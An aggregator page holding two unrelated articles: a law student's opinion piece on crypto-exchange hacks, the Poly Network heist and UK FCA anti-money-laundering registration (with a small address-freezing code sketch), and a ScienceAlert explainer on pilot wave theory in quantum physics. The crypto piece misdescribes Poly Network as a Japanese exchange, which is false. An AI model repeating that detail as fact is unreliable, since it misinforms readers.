In the past year, there has been a spate of hacking attacks on cryptocurrency exchanges, platforms which allow people to trade digital currencies such as Bitcoin and Ethereum. Last September, a hacker managed to take out $610 million (£460 million) worth of customers' coins from Poly Network, a Japanese cryptocurrency exchange.

Interestingly, the hacker returned all of the stolen assets, claiming that the hack was just an attempt to highlight the vulnerabilities in Poly Network's system. When the heist was discovered, Poly Network immediately published the addresses to which the digital assets had been transferred, and asked centralised crypto exchanges to stop all asset flows stemming from the specified addresses. Tether, a stablecoin operator, immediately froze $33 million of the stolen assets, while other major exchanges such as Binance agreed to look into the matter. In the meantime, internet sleuths sprang quickly into action to piece together information about the hacker. A cyber security firm called Slowmist even claimed to have personal information relating to the hacker, such as the hacker's IP address and email information.
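The freeze described above amounts to a simple control applied at the centralised edge of an otherwise decentralised system. The sketch below is purely illustrative (the flagged addresses and function are hypothetical, not Tether's or any exchange's real implementation): it screens a transfer against a published list of addresses tied to an incident.

```python
# Illustrative sketch only: FLAGGED_ADDRESSES and screen_withdrawal are
# hypothetical, not any exchange's or stablecoin operator's real code.

FLAGGED_ADDRESSES = {
    # addresses published after an incident would be loaded here
    "0xattacker-address-placeholder",
}


def screen_withdrawal(source_address: str, destination_address: str, amount: float) -> bool:
    """Return True if the transfer may proceed, False if it should be frozen
    because either side of the transfer appears on the flagged list."""
    if source_address in FLAGGED_ADDRESSES or destination_address in FLAGGED_ADDRESSES:
        print(f"Freezing transfer of {amount}: flagged address involved")
        return False
    return True


if __name__ == "__main__":
    print(screen_withdrawal("0xattacker-address-placeholder", "0xexchange-hot-wallet", 1000.0))
```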

Regardless of whether the hacker's motivations can be taken at face value, what is evident is that identifying errors in the code of a crypto exchange is one thing, but actually laundering those ill-gotten gains into money in the real world is another. Because of the transparency of the blockchain technology upon which cryptocurrencies are built, every transaction in the digital markets is publicly visible, and as proponents of De-Fi (decentralised finance) like to argue, this creates a crowdsourced imitation of a self-regulating banking system.

What, however, are the inherent or systemic problems with having a self-regulatory banking system? For one, how do you draw the line between an ethical white hat hacker, who is just exploiting a bug in the system, and a self-interested criminal? There is of course an argument distinctive to the De-Fi and blockchain context. The unique strength of an open-sourced technological system is that improvements to the system itself are built upon community contributions and ingenuity. On the other hand, what is clear is that ethical hacking cannot be without scope. No ethical hacker would risk the assets or data of thousands of users. One might imagine that if every firm that fell victim to a hack were to legitimise these actions by labelling them as "white hat", then ethical hacking would be devoid of any meaning.

What I find more concerning is the notion that criminality and the commensurate level of punishment can be outsourced to a private company like Poly Network. Hypothetically, imagine if a group of armed robbers organised a traditional bank heist and was able to steal a significant sum of money, which it eventually returned, although it had broken numerous criminal laws along the way, such as criminal trespass, common assault, and other public crimes. Let's imagine as well that the bank is unable to print or obtain more money, and was thus compelled to offer the robbers criminal immunity and a monetary reward if the money was returned. That the money eventually came to no harm is irrelevant; it would even be irrelevant if the armed robbers were not eventually found guilty of those accompanying crimes. In my opinion, what is problematic is the idea that a private company is able to arbitrarily dictate the criminality of a hack, or even to whitewash a criminal hack for commercial reasons.

Things haven't ended on a sour note because the assets have been returned, but shouldn't it be time to consider the implications if a similar situation were to happen again? What happens then if a significant number of consumers of a hugely popular crypto-asset exchange were to lose their life savings through the brilliance of an unscrupulous hacker? What are the legal protections available to consumers, and how robust is the regulatory and compliance regime in place to prevent crypto-assets from being laundered?

From a consumer protection perspective, there are unsurprisingly no guarantees of reimbursement in a largely unregulated sector. In fact, a "haircut" has become a term used to describe partial compensation in the wake of a cyber-attack. For example, in the wake of a hack on Bitfinex in August 2016, which caused a loss of 120,000 Bitcoin, worth around $75 million at the time, its users faced a 36% haircut regardless of whether they held any Bitcoin.

In terms of Anti-Money Laundering (AML) and Know-Your-Customer (KYC) regulation, the UK Financial Conduct Authority (FCA) is the regulator of crypto-asset companies in the UK. Crypto-asset companies have to comply with the Money Laundering, Terrorist Financing and Transfer of Funds Regulations 2017, which includes the requirement of having to be registered with the FCA in order to continue business. The FCA also introduced a Temporary Registration Regime for firms that had applied to be registered before, but whose applications were still being processed. As it turns out, the FCA had to extend the deadline for the Temporary Registration Regime (for existing businesses when the requirement was first announced) to 31 March 2022, due to the unprecedented number of firms which could not meet these requirements and had to withdraw their applications. Since the need to register with the FCA was introduced in January 2020, only five companies have successfully registered with the regulator. In short, the issue isn't really that of a lack of regulation, but that the sector as a whole has yet to catch up in terms of cyber-security and AML practices.

This seems to suggest, therefore, that there is a good chance that retail investors and consumers of such crypto-asset exchanges are using products with significant cybersecurity risks. The need to raise regulatory standards therefore seems like a natural answer. On the other hand, it has been argued that stricter regulatory rules only drive criminals towards exchanges in jurisdictions with looser regulatory requirements. However, as pointed out by Michael Philipps, chief claims officer at cyber insurance group Resilience, these exchanges usually have lower liquidity, which makes the laundering process more difficult. If what we are concerned about is preventing large-scale hacking heists amongst the most widely used exchanges in the UK, then imposing a level of regulation commensurate with the increased level of risk makes sense.

The other libertarian counter-argument would be that investment decisions are personal commercial decisions that inherently involve some level of risk, and that excessively regulating these exchanges would not prevent the ignorant, the gullible, or the fearless from making similar decisions that would be equally risky or dangerous. One's right to plunge one's entire life savings into Bitcoin should be zealously guarded, no matter how crazy such a decision may seem, so the argument goes. However, I think a distinction needs to be made between raising regulatory standards to better inform consumer choice, and banning these exchanges outright. The desire for the UK to grow into a global fintech hub should also be balanced against the consumer risks inherent to these platforms. The priority should not be to discourage the flourishing of fintech businesses and start-ups, but to ensure that any crypto-asset exchange legitimately operating in the UK measures up to a rigorous and sufficient AML/KYC regulatory regime, which would in turn protect consumers.

The reality of course is that while the FCA continually warns retail investors that they risk losing all their money by transacting on these unregulated exchanges, there will always be those who choose to ignore these warnings. But by actively regulating these exchanges and presenting a stark choice between the legitimate and the unregulated, retail traders on unregulated exchanges would have to take stronger ownership of their personal choices, and whatever risks these choices may entail.

Hui Ting Tan is a law graduate and LLM student at the LSE. He is an aspiring commercial solicitor.

Read the original:
How to tackle cyber hacks on crypto exchanges - Legal Cheek

Read More..

Could an Overlooked Quantum Theory Help The Universe Make Sense Again? – ScienceAlert

Back in the 1920s, when the field of quantum physics was still in its infancy, a French scientist named Louis de Broglie had an intriguing idea.

In response to confusion over whether light and matter were fundamentally particles or waves, he suggested an alternative: what if both were true? What if the paths taken by quantum objects were guided by something that rose and fell like an ocean swell?

His hypothesis was the foundation of what would later become pilot wave theory, but it wasn't without its problems. So, like any beautiful idea that falters in the face of experiment, it swiftly became a relic of scientific history.

Today, the majority of physicists subscribe to what's referred to as the 'Copenhagen interpretation of quantum mechanics', which, generally speaking, doesn't give precise locations and momentums to particles until they're measured, and therefore observed.

Pilot wave theory, on the other hand, suggests that particles do have precise positions at all times, but in order for this to be the case, the world must also be strange in other ways which led to many physicists dismissing the idea.

Yet something about De Broglie's surfing particles makes it impossible to leave alone, and over the past century, the idea continues to increasingly pop up in modern physics.

For some, it's a concept that could finally help the Universe make sense from the tiniest quantum particles to the largest galaxies.

To better understand what a pilot wave is, it helps to first understand what it is not.

By the 1920s, physicists were baffled by highly accurate experiments on light and subatomic particles, and why their behavior seemed more like that of a wave than a particle.

The results were best explained by a new field of mathematics, one that incorporated probability theory with the mechanics of wave behavior.

To theoretical physicists like Danish theorist Niels Bohr and his German colleague Werner Heisenberg, who set the foundations of the Copenhagen interpretation, the most economical explanation was to treat probability as a fundamental part of nature. What behaved like a wave was an inherent uncertainty at work.

This isn't merely the kind of uncertainty a lack of knowledge brings. According to Bohr, it was as if the Universe was yet to make up its mind on where to put a particle, what direction it should be twisting, and what kind of momentum it might have. These properties, he maintained, can only be said to exist once an observation has been made.

Just what any of this means on an intuitive level is hard to say. Prior to quantum physics, the mathematics of probability were tools for predicting the roll of a dice, or the turning of a wheel. We can picture a stack of playing cards sitting upside down on a table, its hidden sequence locked in place. Mathematics merely puts our ignorance in order while reality exists with 100 percent certainty in the background.

Now, physicists were proposing a flavor of probability that wasn't about our naivety. And that isn't as easy to imagine.

De Broglie's idea of a hypothetical wave was meant to return some kind of physicality to the notion of probability. The scattered patterns of lines and dots observed in experiments are just as they seem: consequences of waves rising and falling through a medium, little different to a ripple on a pond.

And somewhere on that wave is an actual particle. It has an actual position, but its destiny is in the hands of changes in the flow of the fluid that guides it.

On one level, this idea feels right. It's a metaphor we can relate to far more easily than one of a dithering Universe.

But experimentally, the time wasn't right for de Broglie's simple idea.

"Although de Broglie's view seems more reasonable, some of its initial problems led the scientific community to adopt Bohr's ideas," Paulo Castro, a science philosopher at the University of Lisbon in Portugal, told Science Alert.

Eminent Austrian physicist Wolfgang Pauli, one of the pioneers of quantum physics, pointed out at the time that de Broglie's model didn't explain observations being made on particle scattering, for example.

It also didn't adequately explain why particles that have interacted with one another in the past will have correlating characteristics when observed later, a phenomenon referred to as entanglement.

For around a quarter of a century, de Broglie's notion of particles riding waves of possibilities remained in the shadows of Bohr's and Heisenberg's fundamental uncertainty. Then in 1952, the American theoretical physicist David Bohm returned to the concept with his version, which he called a pilot wave.

Similar to de Broglie's suggestion, Bohm's pilot wave hypothesis combined particles and waves as a partnership that existed regardless of who was watching. Interfere with the wave, though, and its characteristics shift.

Unlike de Broglie's idea, this new proposal could account for the entangled fates of multiple particles separated by time and distance by invoking the presence of a quantum 'potential', which acted as a channel for information to be swapped between particles.

Now commonly referred to as the de Broglie-Bohm theory, pilot waves have come a long way in the decades since.

"The new main hypothesis is that the quantum wave encodes physical information, acting as a natural computation device involving possible states," says Castro.

"So, one can have whatever superposition of states encoded as physical information in the tridimensional wave. The particle changes its state to another by reading the proper information from the wave."

Philosophically speaking, a theory is only as good as the experimental results it can explain and the observations it can predict. No matter how appealing an idea feels, if it can't tell a more accurate story than its competitors, it's unlikely to win over many fans.

Pilot waves fall frustratingly short of contributing to a robust model of nature, explaining just enough about quantum physics in an intuitive way to continue to attract attention, but not quite enough to flip the script.

For example, in 2005 French researchers noticed oil droplets hopped in an odd fashion across a vibrating oil bath, interacting with the medium in a feedback loop that was rather reminiscent of de Broglie's wave-surfing particles. Critical to their observations was a certain quantization of the particle's movements, not unlike the strict measurements limiting the movements of electrons around an atom's nucleus.

The similarities between these macro scale waves and quantum ones were intriguing enough to hint at some kind of unifying mechanics that demanded further investigation.

Physicists at the Niels Bohr Institute in the University of Copenhagen later tested one of the quantum-like findings made on the oil drop analogy based on their interference patterns through a classic double slit experiment, and failed to replicate their results. However, they did detect an 'interesting' interference effect in the altered movements of the waves that could tell us more about waves of a quantum variety.

In a remarkable act of serendipity, Bohr's own grandson a fluid physicist named Tomas Bohr also weighed in on the debate, proposing a thought experiment that effectively rules out pilot waves.

While null results and thought experiments hardly disprove the basic tenets of today's version of de Broglie-Bohm's pilot waves, they reinforce the challenges advocates face in elevating their models to a true theory status.

"The wave quantum memory is a powerful concept, but of course, there is still a lot of work to be done," says Castro.

It's clear there's an aching void at the heart of physics, a gap begging for an intuitive explanation for why reality rides wave-like patterns of randomness.

It's possible the duality of waves and particles has no analogy in our daily experience. But the idea of a wave-like medium that acts as some kind of computational device for physics is just too tempting to leave alone.

For pilot wave theory to triumph, though, physicists will need to find a way to pluck a surfer from its quantum wave and show the two can exist independently. Experimentally, this could be achieved by emitting two particles and separating one from its ride by measuring it.

"Then we make this empty quantum wave interfere with the wave of the other particle, altering the second particle's behavior," says Castro. "We have presented this at the first International Conference on Advances in Pilot Wave Theory."

Practically speaking, the devices required to detect such an event would need to be extremely sensitive. This isn't outside of the bounds of feasibility, but it is a task patiently waiting for an opportunity. Empty pilot waves might even hold the key for solving practical problems in quantum computation by making the waves less prone to surrounding noise.

Future physicists could eventually land on observations that open us to a Universe that makes sense right down to its roots. Should experiments detect something, it'll be a solid indication that far from empty, the heart of physics beats with a pulse. Even when nobody's watching.

All Explainers are determined by fact checkers to be correct and relevant at the time of publishing. Text and images may be altered, removed, or added to as an editorial decision to keep information current.

More:

Could an Overlooked Quantum Theory Help The Universe Make Sense Again? - ScienceAlert

Read More..